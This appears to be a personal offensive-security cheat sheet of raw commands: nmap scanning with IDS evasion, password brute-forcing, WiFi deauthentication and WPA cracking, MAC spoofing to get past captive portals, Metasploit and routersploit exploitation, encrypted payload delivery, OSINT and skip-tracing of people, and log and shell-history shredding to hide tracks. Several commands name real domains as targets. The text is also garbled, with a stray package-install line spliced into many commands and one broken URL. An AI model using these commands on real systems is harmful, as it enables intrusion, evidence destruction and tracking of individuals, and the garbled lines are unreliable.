[If at least one open and one closed TCP port are not found it will not try OS detection against host] -O --osscan-guess nmap 192.168.1.1 -O --osscan-guess Makes Nmap guess more aggressively -O --max-os- tries nmap 192.168.1.1 -O --max- os-tries 1 Set the maximum number x of OS detection tries against a target

[Enables OS detection, version detection, script scanning, and traceroute] nmap 192.168.1.1 -A

------------------------[ NMAP INTRUSION DETECTION ] ---------------------------------

-T0 [Paranoid (0) Intrusion Detection System evasion] * nmap -T0 <victim_ip>

-T1 [-T1 Sneaky (1) Intrusion Detection System evasion] *-T1 nmap 192.168.1.1

-T2 [(tricky scan to avoid IDS) slows down the scan to use less bandwidth and use less target machine resources] * T2 nmap 192.168.1.1

-T3 [Normal (3) which is default speed] *T3 nmap 192.168.1.1

-T4 [Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network] * nmap 192.168.1.1 -T4

-T5 [very aggressive (5) speeds scan; assumes you are on an extra] * nmap 192.168.1.1 -T5

[------------------------ NMAP HOST DETECTION -------------------------]

[Remote OS detection using TCP/IP stack fingerprinting] nmap 192.168.1.1 -O

[One open port One closed port = open machine] nmap 192.168.1.1 -O -osscan-limit

[Aggrressive Nmap OS Scan] nmap 192.168.1.1 -O -osscan-guess

nmap -sV -pN xx # basic nmap scan nmap -p local_ip_doman/24 -oG nmap_out.txt nmap 192.xxx -oX /dir/file.xml ## to output nmap to .xml nmap -A -Pn xxx/0/24 # os scan nmap -sA xxxx # tcp-ack scan --> unfilterd and filtered ports nmap -sI zombiehost.com domain.com nmap -sW xxx # window scan nmap -sV host,com -scrip dns-brute ## chain script

sudo nmap -sV -Pn -v dns.server.name (#port knocking) Sudo nmap -A -Pn -v 76.172.85.231 nmap -sI -v google.com 192.168.50.1 2 ⚙ nmap -sW -v 192.168.50.1

nmap to find who's on Lan (subnet)

[---------------- NMAPP - SCRIPTING (BASIC) ---------------------]-

**************NSE script with arguments ****************** ----> cd /usr/share/nmap/scripts

--script [exectute the listd scripts agsint victim ip] * nmap --script= test script victim_ip

-sV -sC = [use only safe default scripts for scan] * nmap -sV -sC

[Scan with default NSE] -scripts. Considered useful for discovery and safe nmap 192.168.1.1 -sC

[Scan with default NSE]- scripts. Considered useful for discovery and safe nmap 192.168.1.1 --script default

["not intrusive" Scan default, but remove intrusive scripts] *nmap 192.168.1.1 --script "not intrusive"

[Scan with a single script. Example banner] *nmap 192.168.1.1 --script=banner

[Scan with a wildcard] -- Example http nmap 192.168.1.1 --script=http*

[SCAN with two scripts] --script nmap 192.168.1.1 --script=http,banner

[NMAP Scan with arguments] nmap --script snmp-sysdescr --script-args snmpcommunity=admin 192.168.1.1

[---------------- NMAPP - VULN SCRIPTING (ADVANCED) ---------------------]-

--script [running two scripts against target] nmap 192.168.1.1 --script=http,banner

[HTTP Site generator] --script=http-sitemap-generator =

nmap -Pn --script=http-sitemap-generator scanme.nmap.org

[Fast search for random web servers]

nmap -n -Pn -p 80 --open -sV -vvv --script=banner,http-title -iR 1000

[Brute forces DNS hostnames guessing subdomains]

nmap -Pn --script=dns-brute domain.com

[Safe SMB]

 * nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv 192.168.1.1

[whois query] * nmap --script whois* domain.com

[Detect cross site scripting vulnerabilities]

* nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org

[Check for SQL injections]

* nmap -p80 --script http-sql-injection scanme.nmap.org

[NMAP - VULN SCRIPT-- INTENSE] nmap --script nmap-vulners/ -sV -sS -Pn -A -v 192.168.50.1/24 --version-intensity=9 nmap -sV --script=vulscan/vulscan.nse 192.168.50.111 nmap --script nmap-vulners/ -sV www.securitytrails.com nmap --script nmap-vulners/ -sV 11.22.33.44 nmap --script nmap-vulners/,vulscan/ -sV yourwebsite.com nmap -Pn --script vuln 192.168.1.105 nmap -iL probed.txt -T5 -oA scans/port_scan.txt -V sudo apt install ./discord.deb echo "scanning for open ports" nmap -iL probed.txt -T5 -oA scans/port_scan.txt -V

[NMAP scriptlocation]

cd /usr/share/nmap/scripts nmap --script nmap-vulners/ -sV -sS -Pn -A -v 192.168.50.1/24 --version-intensity=9 nmap -sV --script=vulscan/vulscan.nse 192.168.50.111 nmap --script nmap-vulners/ -sV www.securitytrails.com nmap --script nmap-vulners/ -sV 11.22.33.44 nmap --script nmap-vulners/,vulscan/ -sV yourwebsite.com nmap -Pn --script vuln 192.168.1.105

php vulnerability

nmap -sV --script=http-php-version testphp.vulnweb.com

BRUTE FORCE

BRUTESPRAY --> requries nmap fiel

nmap 192.168.50.1 -oX /home/frank/nmapout.xml nmap cpanel.dedicatedglass.com/24 -oX /home/frank/nmap.xml

brutespray --file nmapout.xml --threads 5 brutespray -file nmapout.xml -t 5 -s ftp brutespray --file nmapfuad.xml -U names.txt -P milw0rm-dictionary.txt --threads 5 brutespray --file nmapfuad.xml -U /home/frank/names.txt -P /home/frank/milw0rm-dictionary.txt --threads 5

└─# nmap -sS -T5 -PP -PE -PM -PI localhost

nmap -Sn xxx.xxx # ping scan nmap -sL # list scan, returns device name nmap -Pn # returns oepn ports . devname and mac address nmap -Sn --traceroute xxx.xx/24 nmap -Sn # ping scan nmap -sL # list scan returns device and if its up or down nmap -Pn # returns oepn port, best used with direct IP nmap -Sn --traceroute ip/24 nmap ip.25 -p1-6000 # specify port nmap -sV # find the service version nmap -sV xxx.xxx --version-intensity=9 nmap -o xxx --oscan-guess nmap -A xx.xx version-intensity=9 nmap -sV -A --script=vulners ip --version intesnsity=9 nmap -sV -A xxx.xxx --version-intesity=9

php vulnerability

nmap -sV --script=http-php-version testphp.vulnweb.com nmap 192.168.50.1 -oX /home/frank/nmapout.xml nmap cpanel.dedicatedglass.com/24 -oX /home/frank/nmap.xml sudo nmap -sP -n 192.168.0.0/24 ## nmap to return mac address sudo nmap -sV --scripts=vulscan xxxx whois lookup (PORT SCAN WITH IplisT) sudo nmap -iL iplist.txt sudo apt install ./discord.deb (ScAN, WITH SPEED ) sudo nmap -O -iL iplist.txt -T5

(OSCAN SCAN) sudo nmap -O -iL iplist.txt

(TCP poRT SCAN) sudo nmap -sA -iL iplist.txt

(TCP poRT SCAN) sudo nmap -sU -iL iplist.txt

(PoRT SCAN WEBSITE -layer 2) sudo nmap -PE -sn website.com

(PoRT SCAN WEBSITE -layer 3, fireall) nmap -PA80 -sn website.com

(FIND OPEN PORT ON SPECIFIC DEVICE) sudo nmap -F 192.168.86.20

(FIND OPEN PORT AND OS) sudo nmap -sV -p- -A 192.168.1.15

(FIND IP ADDR OF WEBSITE) nslookup dedicatedglass.com

(BETTERCAP - INTERNAL PROBE) sudo bettercap net.probe on

(FIND WHOS ON NETWORK) nmap -A -sL 192.168.86.0/24

(FIND THE ROUTER IP) └─$ netstat -r -n Kernel IP routing table

(SCAN COMMON PORTS OF IOT DEVICES) nmap -A -p 80,8080,8081,81 192.168.64.1

(SCAN OPEN PORTS ON NETWORK, WITH OS) └─$ sudo nmap -A -sS -O 192.168.64.1

(SCAN DEVICE NAMES ) nmap -A -sP 192.168.1.0/24

(SCAN DEVICE SPECIFIC PORTS)sudo apt install ./discord.deb Sudo nmap -A -sS -O 192.168.86.35

CANARY TOKENS

canarytokens.com/generate

LOGS

kill -9 $$ ## exits the terminal without saving history wget https://raw.githussh -T [email protected] "sudo timeout 60 tcpdump -i wlan0 "not port 22 and not host localhost" -w - " > tcp_dump1.pcap busercontent.com/sundowndev/covermyass/master/covermyass chmod +x covermyass ./covermyass

BASH HISTORY

cd /dev/shm/ rm /root/.bash_history

or edit the var $HISTSIZE and $HISTFILESIZE

AUTH-LOG FILES

cd /var/log sudo rm auth.log shred -zu /var/log/auth.log ## safely overwrite logs with 0's and 1's truncate -s 0 /var/log/auth.log

------------------------------------------------------ [PORT-MAN] ------------------------------------------------------

UBUNTU - NGINX - FIREWALL sudo ufw status sudo ufw allow 80/udp sudo ufw allow 80/tcp sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT sudo ufw allow 9999/udp sudo ufw allow 9999/tcp sudo iptables -A INPUT -p tcp --dport 9999 -j ACCEPT sudo iptables -A INPUT -p udp --dport 9999 -j ACCEPT sudo ufw allow 20/tcp sudo ufw allow 21/tcp sudo ufw allow 990/tcp sudo ufw allow 40000:50000/tcp sudo ufw status

To add new user

useradd -r user2

basics

iwevent -- to get wireless events iwgetid - reports curretn essid / ap

NOISY--> diguise packets hidden behind prexisting servers (by generaitng random traffic)#

--> best if used if you think someone is spying on you or the network

ADD SITES TO CONFIG FILE sudo apt install ./discord.deb

git clone https://github.com/1tayH/noisy.git nano config.json python noisy.py --config config.json

------------------------------------------------------ [Change MAC Address] ------------------------------------------------------

MAC ADDRESS RANDOMIZATION ( CELL PHONES )

conecting to portals --> swap mac address on whitelist with an already authorized Mac address

1. put card into wiresless monitor mode

2. find exisitng users on the whitelist. find the channel of ESSID

3. copy the mac connected to router.

sudo apt-get install macchanger aircrack-ng sudo iwconfig wirelessInterface down sudo macchanger -r wirelessInterface ip a # to find current NICs in use sudo airmon-ng start wirelessInterface # to put in into monitor mode sudo airodump-ng wirelessInterface -c 11 --encrypt OPN # to see only open networks --> displays list of connected devices on network sudo ifconfig nicNonMonitorMode down sudo macchanger -m newMacfromabove nicNonMonitormode sudo ifconfig nicNonMonitorMode up

------------------------------------------------------ [PROXYCHAINS] ------------------------------------------------------

EDIT CONFIG /ETC/PROXYCHAINS.CONF

sudo apt-get install -y proxychains proxychains nmap ip/24 proxychains tor ------------------------------------------------------[SHRED_LOG_DATA]------------------------------------------------

NMAP SCRIPT LOCATION

ls -al /usr/share/nmap/scripts/

CANARY TOKENS

canarytokens.com/generate

LOGS

exits the terminal without saving history kill -9 $$ wget https://raw.githubusercontent.com/sundowndev/covermyass/master/covermyass chmod +x covermyass ./covermyass

BASH HISTORY

cd /dev/shm/ rm /root/.bash_history

or edit the var $HISTSIZE and $HISTFILESIZE

AUTH-LOG FILES

cd /var/log sudo rm auth.log shred -zu /var/log/auth.log ## safely overwrite logs with 0's and 1's truncate -s 0 /var/log/auth.log

------------------------------------------------------ SHRED SESSION & TERMINAL LOGS --------------------------------------------

function _removeSSHLogs() { sudo find _sshMSG -type f -exec shred -n 10 {} \ && sudo find /var/log/syslog -type f -exec shred -n 10 {} ; sudo find ~/.ssh/github_rsa.pub -type f -exec shred -n 10 {} } function _removeAllLogs() { echo "[!] Removing Logs.. \n\t Old Logs\n $(lastlog)" sudo find *.log -type f -exec shred -n 10 {} \ && sudo find /var/log -type f -exec shred -n 10 {} # for logs cat /dev/null > ~/.bash_history && history -c && exit ## to remove history sudo grep -r *.log _sysLogs | sudo rm sysLogs ## just in case #1 doesnt wrok rm /root/.bash_history dmesg | less && _checkLogs sudo covermyass now }

function _checkLogs() { cat ./bash_history }

------------------------------------------------------ STAY ANONYMOUS ------------------------------------------------------ macchanger -r [channges mac to a random number] i2prouter start [#### IP2ROUTER --> File sharing / hosting ] tor + proxy vpn (most cant be trusted) https://inteltechniques.com/ [THrow away emails] tempmailer.de https://api.wigle.net/ [excellent gps and realtime tracking tool] shodan.io ## --> d[simular to wiggle, but contains open streams and devices] https://null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/

grabify.link ## --> track usersr https://nvd.nist.gov/developers/vulnerabilities https://www.exploit-db.com/ securityfocus.com https://sur.ly/i/breachforums.com/ namecheckup.com ## --> osnit https://neatnik.net/steganographr/ --> stenography (*to hide tracks)

MANGLE TTL

WINDOWS

netsh int ipv4 set glob defaultcurhoplimit=65 netsh int ipv6 set glob defaultcurhoplimit=65 netsh int ipv6 set glob defaultcurhoplimit=128 # <-- RESET BACK TO DEFUALT

LINUX (default ttl=64)

iptables -t mangle -I POSTROUTING 1 -j TTL --ttl-set 66 ########################

make abunch of differnt APS

---------------------------------------------------PGP-GPG-----------------------------------------------

py ######## OPEN SSL #######

use private key to sign secret.enc.

openssl genrsa -aes-256-cbc -out newkey.key 4096 # generate pvt key openssl rsa -in newkey.key -pubout > public.key # to generate public key openssl rsatl --encrypt -inkey private.key -pubout > public.key -pubin -in messsage.txt -out message.enc ## encrypt a file openssl rsatl --decrypt -inkey myprivate.key -in message.enc > clear_view.txt openssl genrsa -des3 -out another_pvt_key.key 4096 ## to derive anothers public key

openssl rsautl --decruypt -inkey bob-put.key -in secret.enc > message.txt # to decrypt mesg openssl dgst -sha256 -sign private.key -out signer secret.enc openssl base64 -in signer -out my_signature # to sign ssl openssl dgst -sha256 -verify anothers_pub_key.key -signature signer secret.enc

--> OPEN SSL ENCRYPTION Private key openssl genrsa -aes-256-cbc -out macair.key 4096 openssl genrsa -aes-256-cbc -out macair.key 4096

Public key

openssl rsa -in frank.key -pubout > frankpublic.key

verification file

making signed encryption

openssl dgst -sha256 -sign macair.key -out signer verifcation.enc

to sign

openssl base64 -in signer -out verifcation.enc

#################################### ################################################

################################################

-----------------------------FEW TIPS AND TRICKS---------------------------

########################

OSNIT / SPY BLUETOOTH

unlike wifi, bluetooth negotates a key ones and stores it. this happens on first handshake, making packet inseretion and listneing harder

###########################

########################

INTRUSION DETECTION

Sparrow Wifi # -->

https://github.com/ghostop14/sparrow-wifi gpsd -D 2 -N /dev/ttyUSB0 # WARDRIVING --> graphs sudo ./sparrow-wifi.py

KISMET - FIND ALL THE NETWORK HOST, AND DEVICE MANU

DEATH AND LIMIT BANDWIDTH ON NETWORK

EVIL LIMITER--> TO DE AUTH AND KICK OFF NETWORK USERS

git clone https://github.com/bitbrute/evillimiter.git cd evillimiter sudo python3 setup.py install sudo evillimiter scan limit 1,2,3,4,5,6 200kbit ## LIMIT OR BLOCK NETWORK USERS block 3 hosts free all

sudo wireshark ## to watch network traffic #####################################################

################################################

lookoups#### 2 ⚙

proxychains firefox ike-scan dnstracer dedicatedglass.com Nslookup dedicatedglass.com (to get dns) Ping -a dedicatedglass.com tlssled 192.168.50.1 2 ⚙ sslscan -h dedicatedglass.com Recon-ng 2 ⚙ To grab SSL certificates sslyze --regular website or ip nslookup IP >> nslookup.txt http://geoiplookup.net/sudo apt install ./discord.deb

########## DNS LOOKUPS ############

host, nslookup, dig

host domain.com ## returns host IP and mailserver host -t ns domain.com host -t mx domain.com host ip_address # reverse dns

nslookup domain.com nslookup # to enter nslookup console

webserver

set type=ns domain.com

mail server

set type=mx domain.com

dig --help dig domain.com dig domain.com -t mx dig domain.com -t ns dig domain.com AAAA # ipv6 addresses

##################################

JOHN THE RIPPER

rar2john $HASHED_FILE rar2john $HASHED_FILE > hash.txt john --format=zip hash.txt

WIRESHARK

MANGLED TTYL (FREE WIFI AP ACCESS)

#################### AIRMON-NG // SUITE ####################### ############################################################### radio_name = $(iw dev | awk) '$1=="Interface"{print $2}' sudo airodump-ng wlx0013eff5483f ## fo rmonitoring airodump-ng wlx0013eff5483f --encrypt wep airodump-ng wlx0013eff5483f -c 11 ## TO BROADCAST ESSID airodump-ng wlx0013eff5483f -c 11 & wireshark ## TO BROADCAST ESSID and use wireshark for packet injection

find transmitter device on wireshark and set filter with pipe

wlan.ta == MAC || wlan.da MAC #(da = destination, ta is starting transmission) eapol #(in wireshark filter--> it displays the handshakes from ^) https://www.youtube.com/watch?v=5guDKTc6Hak aircrack-ng -w 'password-list location' '.pacap location' # get pcap from wireshark ^ --> to crack the password

TO GET DEVICES AND DISTANCE

sudo iw dev wlx0013eff5483f scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort

TO FIND WEP PROTECTION

airodump-ng wlx0013eff5483f --encrypt wep aireplay-ng -0 0 mac -c mac_of_radio radio_name airemon-ng start external_radio 6 # the number is the channel (TO START MONITOR MODE) kismet -c radio_name ## GETS THE MAC ADDRESS

send deauth

#1 find mac for router (-a) and client (-c) netdiscover -r 192.168.50.1/24 aireplay-ng --deauth 90000000 -a F0:2F:74:2C:7E:88 -c 9a:26:55:ed:ef:84 wlo1

###########################

IFRENAME

ifrename # to rename wireless iwevent # display wireless events iwgetid # reports current essid iwlist # scan savailable aps or essid iwspy # monitors iw nodes and records strenght and quality of signal

######### TO DISPLAY AND SHOW USB DEVICES #### lspci lscpu lsusb lsblk lslo lsslcb lshw

to get available ESSID

sudo iwlist [nic name] scan | grep ESSID nmcli dev wifi

TO CREATE CUSTOM AP

wpa_supplicant/hostap hostapd # to create AP for wifi sharing wpa_supplicant # allows scanning and connection to AP

INSTALL ALL KALI DEPENDENCIES

apt install kali-linux-everything

-------------------------------[NMAP]--------------------------------------------------

############ NMAP #############

KEYS

-A -> OS INFO

-sV -> list running svc on port

-Pn -> ignore if up / down

-Sv nmap to return open ports and services (specific device)

-v adds verbosity

cd /usr/share/nmap/scripts ## to find nmap vuln scripts

nmap -v == add verbosity

nmap --reason --> why port is in its state

nmap --packet-trace --> shows all send/recv packets

nmap --opem xxx.xxx

#############################

-------------------------------[NMAP]--------------------------------------------------

#############################

password crackers

hashcat scp @: scp -r @: # dir scp echo "put files*.xml" | sftp -p -i ~/.ssh/key_name [email protected] #u using relative loc sftp -b batchfile.txt ~/.ssh/key_name [email protected] # using batch in text

BRUTE FORCE #### PASSWORDS

BRUTESPRAY --> requries nmap fiel

apt install brutespray brutespray --file nmapout.xml --threads 5 brutespray -file nmapout.xml -t 5 -s ftp brutespray --file nmapfuad.xml -U names.txt -P milw0rm-dictionary.txt --threads 5 brutespray --file nmapfuad.xml -U /home/frank/names.txt -P /home/frank/milw0rm-dictionary.txt --threads 5

sudo apt install ncrack ncrack -u users.tx -p passwords.txt

sudo apt-get install hydra-gtk sudo apt-get purge hydra-gtk && sudo apt-get autoremove && sudo apt-get autoclean hydra -L users.txt -P passwords.txt location_pass.txt pantor ftp_login host=ip , user=users.txt password- pass.txt 0=users.txt 1=passwords.txt

USE CUPS AND THE MENTALIST TOGETHER TO GENERATE CUSTOM PASSWORD LISTS.

USE CUPS TO CREATE PASSWORD LIST WITH GIVEN USER INPUT (NAME, COMPANY BDATE ETC... )

git clone https://github.com/Mebus/cupp.git nano cupp.config python cupp.py -i

USE THE MENTALIST (GUI) TO CREATE CUSTOM #'S AND SPECIAL CHARICTERS TO PASSWORD LIST GENERATED FROM CUPP

sudo apt install git python3-setuptools python3-tk git clone https://github.com/sc0tfree/mentalist cd mentalist/ sudo python3 setup.py install

PHOTON SCANNER

https://null-byte.wonderhowto.com/how-to/use-photon-scanner-scrape-web-osint-data-0194420/

photon focuses on data for password hasshes, api keys, and 3rd party ninja query.

#[DOCS] https://github.com/s0md3v/Photon

-t threads , --stdout, --ninja, --wayback (use archive.org for old dirs), --dns (dns dump)

pip install tld requests git clone https://github.com/s0md3v/Photon.git cd Photon python3 photon.py -h

sudo python3 photon.py -u 'domain.com' --verbose sudo python3 photon.py -u 'domain.com' --keys --dns -t 3

python3 photon.py -u https://www.priceline.com/ --dns python3 photon.py -u https://www.pbs.org/ --keys -t 10 -l 3 ### EXTRACT SECRET KEYS python3 photon.py -u https://www.pbs.com/ --keys -t 10 -l 1 --ninja ### NINJA MODE

#####################################

DEEP OSNIT ### THE HARVESTER

PUBLIC INFO ON BUSINESS NETWORKS

wigle.net cd /home/frank/the_harvester python3 theHarvester.py -d dedicatedglass.com -l 500 -b all

RECON-NG --> contains modules simular to metasploit

GREAT FOR OSNIT

git clone 'https://github.com/lanmaster53/recon-ng' workspaces add ws1 ## CERATE WORKSPACE show workspaces workspaces select default show modules add domains ### USE THIS THIS TO ADD TO DATA TABLE FOR EXPLOIT show domains add companies show companies search whois # displays modules that exist for whois use whois_pocs show info ## displays module info and the data structure user provided show # displays information to be used in console show dashboard ## shows all current activities / tasks peformed add # need to #########################################################################

######### metasploit # ########### Msfconsole Search samba_symlink_traversal Use / dir to exploit Show options Set option IP (look for required) Exploit (to run export)

SEARCHSPLOIT --->> ALLOWS ACCESS TO EXPOOIT-DB DATABASE

https://github.com/offensive-security/exploitdb

git clone 'https://github.com/offensive-security/exploitdb' searchsploit -h

kali

sudo apt -y install exploitdb sudo apt -y install exploitdb-bin-sploits exploitdb-papers

ubuntu

sudo git clone https://github.com/offensive-security/exploitdb.git /opt/exploitdb sudo ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit

darwin

brew update && brew install exploitdb

########################################################################

######## LOCALIZED INFO ###### ALL HARDWARE INFO Apt install infix Infix -Fxz

DIRS=$(ls *.txt) broadcast = $(ifconfig | grep broadcast) mac = $(ifconfig | grep mac)

OSNIT

Phonenumbers scanner phoneinfoga scan -n phoneinfoga scan -n "+1 (555) 444-1212"

SKIP TRACER (REVERSE-LICENSE LOOKPI)

git clone https://github.com/xillwillx/skiptracer.git skiptracer cd skiptracer pip install -r requirements.txt python skiptracer.py -l (phone|email|sn|name|plate)

######################################

to create fake AP

https://cybergibbons.com/security-2/quick-and-easy-fake-wifi-access-point-in-kali/ cd /etc/hostapd nano hostapd.conf ./hostapd.conf iwevent

WIRESHARK CLI

tshark -D tshark -i 2 -i 5 -i 6 tshark -i 2 -i 5 -i 6 > firstWIRE.csv tshark -i wlx0013eff5483f tshark -i wlx0013eff5483f -i any (## all interfaces)

CRACKING WEP / WPA

besside-ng en0 -c 6 -b airodump-ng wlx0013eff5483f --encrypt wep

--------------------- WEB APP ==================

GOOGLE DORKS

TO FIND NONSECURE LINKS ON WEBSERVER

site:dedicatedglass.com inurl:http

TO DORK FOR LOGFILES

Allintext:password textfile:log after:2018

WEBSERVER ENUMERATION

apt install whatweb ip whatweb -4 domain.com

to get dns info

dnsrecon -d domain.com whatweb domain.com

python rsf.py

TO ENUMERATE SUBDOMAINS sublist3r

wget https://github.com/aboul3la/Sublist3r/archive/master.zip unzip master.zip ./sublist3r.py -d yourdomain.com

look thru namesystem for hidden

sudo apt install dirbuster

WEB BASED VULNS

git clone https://github.com/droope/droopescan.git apt install python-pip pip install droopscan pip install -r requirements.txt ./droopescan scan --help

doopscan to scan vulnrable webservers

droopscan scan drupal -u URL_HERE droopscan scan silverstripe -u URL_HERE ./droopescan scan --help droopescan scan drupal -u example.org droopescan scan drupal -U list_of_urls.txt droopescan scan -U list_of_urls.txt

python skiptracer.py -l (phone|email|sn|name|plate)

Nikto for webserver vuln scans

git clone https://github.com/sullo/nikto

Main script is in program/

cd nikto/program

Run using the shebang interpreter

./nikto.pl -h http://www.example.com

Run using perl (if you forget to chmod)

ONENVAS (NESSUS CLONE) VULN SCAN

apt install openvas

######$#######################

LAZY SCRIPT --> WIFI VULN

https://null-byte.wonderhowto.com/how-to/hack-wi-fi-networks-more-easily-with-lazy-script-0185764/

https://github.com/arismelachroinos/lscript

cd git clone https://github.com/arismelachroinos/lscript.git cd lscript chmod +x install.sh ./install.sh iwconfig wlan0 mode monitor ip a

######$#############################################################

###3 ROUTERSPLOIT --> ROUTERS, WEBCAM, ANY BROADCASTED DEVICE ###

https://null-byte.wonderhowto.com/how-to/seize-control-router-with-routersploit-0177774/

AutoPwn

sudo apt-get install python3-pip requests paramiko beautifulsoup4 pysnmp git clone https://github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py

(Install for mac os)

git clone https://github.com/threat9/routersploit cd routersploit sudo easy_install pip sudo pip install -r requirements.txt

cd cd routersploit sudo python ./rsf.py

show all # Everything on RS

scanning a target

use scanners/autopwn show options ## shows the variales chosen for module seleted ^ set target xxx.xxx.xxx run use exploits/routers/3com/3cradsl72_info_disclosure ## to run specific exploit after scan run show options set target check run

Basic Enumeration With Metasploit and Nmap

use netdiscover or arp -a for local network

ls -al /usr/share/nmap/scripts/
netdiscover -i eth0 -r 192.168.50.xxx/24 nmap -sn 192.168.50.xxx/24

look for target OS and service versions (pay attention to service versions for exoit and vuln scan)

pay attention to ftp timeout

pay attentin to CVE number--> look online for exploit detials

nmap 192.168.50.TARGET_IP # scans 1000 of most common ports nmap -sS -A -T1 -p- 92.168.50.TARGET_IP -oN target_info_nmap.txt ls -al /usr/share/nmap/scripts/ | grep -e "ftp-" nmap -sV -p 21 192.168.50._TARGET_IP --script /usr/share/nmap/scripts/FTP_SCRIPT_DUMMY searchsploit FTP_SCRIPT_DUMMY msfconsole search FTP_SCRIPT_DUMMY use FOUND_MODULE_FROM_MFS set RHOSTS 192.168.TARGET_IP run

if root privledage is granted, start exexuting

#############################################################################

######$#######################

ARP SCAN

echo ('enter pass:') read pass $(arp-scan -l | grep Raspberry | awk '{print $1}') root $pass apt-get update && apt-get install sparta python-requests

password crackers

hashcat scp @: scp -r @: # dir scp echo "put files*.xml" | sftp -p -i ~/.ssh/key_name [email protected] #u using relative loc sftp -b batchfile.txt ~/.ssh/key_name [email protected] # using batch in text

MAC ADDRESS RANDOMIZATION ( CELL PHONES )

CONNECTING TO PUBLIC PORTALS --> swap mac address on whitelist with an already authorized Mac address

1. put card into wiresless monitor mode

2. find exisitng users on the whitelist. find the channel of ESSID

3. copy the mac connected to router.

sudo apt-get install macchanger aircrack-ng sudo iwconfig wirelessInterface down sudo macchanger -r wirelessInterface ip a # to find current NICs in use sudo airmon-ng start wirelessInterface # to put in into monitor mode sudo airodump-ng wirelessInterface -c 11 --encrypt OPN # to see only open networks --> displays list of connected devices on network sudo ifconfig nicNonMonitorMode down sudo macchanger -m newMacfromabove nicNonMonitormode sudo ifconfig nicNonMonitorMode up

##################### AIRGEDDON ############

BYPASSING WPA WIRELESS SECURITY (BRUTEFORCE WIFI PIN, RATHER THAN WPA)

airgeddon (wireless attack framework including BULLY) must use pixiedust too (not in airegeddon)

https://nulb.app/x49tg

install airgeddon dependenacies

command 2, then command 8

once the search is used-- leverage pixy dust, optin 7

git clone 'https://github.com/v1s1t0r1sh3r3/airgeddon' sudo ./airgeddon.sh ## setup config option 2, then option 8, then option 4 (to explore)

LINUX SHELL EXPLOITATION

https://null-byte.wonderhowto.com/how-to/find-exploits-get-root-with-linux-exploit-suggester-0206005/

1. set up http server on host computer

2. use client to upload the exploit (wget les2.pol--> [abbreviated name])

3.

wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl python3 -m SimpleHttpServer ## log the server IP

or

python2 -m SimpleHttpServer

GO TO TARGET COMPUTER

wget xxx.xxx/les2.pl # from SimpleHttpServer on to target machine chmod +x les2.pl ./les2.pl ## to run the module --> its on the target PC

TIDoS ---> probe webapps for vulnerabilities

https://null-byte.wonderhowto.com/how-to/probe-websites-for-vulnerabilities-more-easily-with-tidos-framework-0193854/

git clone https://github.com/0xinfection/tidos-framework.git cd tidos-framework sudo apt-get install libncurses5 libxml2 nmap tcpdump libexiv2-dev build-essential python-pip default-libmysqlclient-dev python-xmpp sudo pip2 install -r requirements.txt chmod +x install ./install sudo tidos

RECON-NG --> contains modules simular to metasploit

GREAT FOR OSNIT

git clone 'https://github.com/lanmaster53/recon-ng' workspaces add ws1 ## CERATE WORKSPACE show workspaces workspaces select default show modules add domains ### USE THIS THIS TO ADD TO DATA TABLE FOR EXPLOIT show domains add companies show companies search whois # displays modules that exist for whois use whois_pocs show info ## displays module info and the data structure user provided show # displays information to be used in console show dashboard ## shows all current activities / tasks peformed add # need to #####################################

git clone https://github.com/evilsocket/bettercap cd bettercap bundle install gem build bettercap.gemspec sudo gem install bettercap*.gem

sudo apt-get install build-essential ruby-dev libpcap-dev apt install golang go get github.com/bettercap/bettercapsudo apt install ./discord.deb cd $GOPATH/src/github.com/bettercap/bettercap make build sudo make install sudo bettercap bettercap

####### NIKTO VULN-SCANNER #########

https://github.com/sullo/nikto/wiki

http://bit.ly/NiktoScan

brew install nikto sudo apt install nikto

SSL

nikto -h domain.org -ssl # ssl scan ipcalc local_ip_domain

IP ADDRESS FROM NMAP

nmap -p local_ip_doman/24 -oG nmap_out.txt cat nmap_out.txt | awk '/Up$/{print $2}' | nikto -h | cat >> targetIP.txt # awk returns just IP address.. may ahve to play around with $ val cat targetIP.txt nikto -h targetIP.txt

Webserver

nikto -h www.hell.com | cat >> niktoResults.txt nikto -h www.domain.com -Format msf+

NESSUSS

TO DISCOVER NETWORK HOSTS

IDENTIFIY CRITICAL INFO / PERFORM VULN SCAN

GENERATE REPORTS

https://www.tenable.com/products/nessus https://localhost:8834/

git clone https://github.com/tokyoneon/Armor cd Armor/ chmod +x armor.sh echo 'ls -la' >/tmp/payload.txt ./armor.sh /tmp/payload.txt 1.2.3.4 443

cat thisfileisevil.py | base64 python -c "$(printf '%s' 'ENCODED-PAYLOAD-HERE' | base64 -D)"

############

EVIL LIMITER--> TO DE AUTH AND KICK OFF NETWORK USERS

git clone https://github.com/bitbrute/evillimiter.git cd evillimiter sudo python3 setup.py install sudo evillimiter limit 1,2,3,4,5,6 200kbit ## LIMIT OR BLOCK NETWORK USERS

------------------------------------------------------------------- RESOURCES --------------------------------------------------------------------------

https://www.amazon.com/Hacking-Art-Exploitation-Jon-Erickson/dp/1593271441/ Hacking: The Art of Exploitation
https://www.crypto101.io/ - Crypto 101 is an introductory course on cryptography
http://www.offensive-security.com/metasploit-unleashed/ - Metasploit Unleashed
http://www.cl.cam.ac.uk/~rja14/book.html - Security Engineering
https://www.feistyduck.com/library/openssl-cookbook/ - OpenSSL Cookbook
https://www.manning.com/books/real-world-cryptography - Learn and apply cryptographic techniques.
